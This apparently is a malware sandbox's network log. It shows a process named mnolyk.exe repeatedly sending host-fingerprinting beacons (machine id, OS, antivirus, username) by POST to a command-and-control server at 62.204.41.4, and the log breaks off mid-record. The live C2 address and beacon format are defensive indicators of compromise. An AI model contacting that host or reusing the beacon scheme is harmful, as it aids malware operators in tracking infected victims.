Feb 7, 2023 20:03:15.892023087 CET	664	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.6	49770	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:03.285970926 CET	164	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:03.349364042 CET	164	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
510	192.168.2.6	50235	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:16.065618992 CET	665	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:16.132009029 CET	665	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
511	192.168.2.6	50236	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:16.324345112 CET	666	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:16.389148951 CET	666	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
512	192.168.2.6	50237	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:16.563327074 CET	667	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:16.627619982 CET	667	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
513	192.168.2.6	50238	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:16.812391996 CET	668	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:16.876820087 CET	668	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
514	192.168.2.6	50239	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:17.051311016 CET	669	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:17.116439104 CET	669	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
515	192.168.2.6	50240	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:17.295969963 CET	670	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:17.359875917 CET	670	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
516	192.168.2.6	50241	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:17.535341024 CET	671	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:17.598932981 CET	671	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
517	192.168.2.6	50242	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:17.764358997 CET	672	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:17.827296972 CET	672	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
518	192.168.2.6	50243	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:17.999929905 CET	673	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:18.065951109 CET	673	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
519	192.168.2.6	50244	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:18.251405001 CET	674	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:18.314459085 CET	674	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.6	49771	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:03.532617092 CET	165	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:03.595849991 CET	165	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
520	192.168.2.6	50245	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:18.483828068 CET	675	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:18.548212051 CET	675	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
521	192.168.2.6	50246	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:18.721407890 CET	676	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:18.785443068 CET	676	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
522	192.168.2.6	50247	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:18.979917049 CET	677	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:19.043632984 CET	677	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
523	192.168.2.6	50248	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:19.236085892 CET	678	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:19.300606012 CET	678	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
524	192.168.2.6	50249	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:19.487023115 CET	679	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:19.551383018 CET	679	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
525	192.168.2.6	50250	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:19.754499912 CET	680	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:19.820547104 CET	680	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
526	192.168.2.6	50251	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:20.007203102 CET	681	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:20.073108912 CET	681	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
527	192.168.2.6	50252	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:20.248979092 CET	682	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:20.311841965 CET	682	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
528	192.168.2.6	50253	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:20.519824982 CET	683	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:20.583318949 CET	683	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
529	192.168.2.6	50254	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
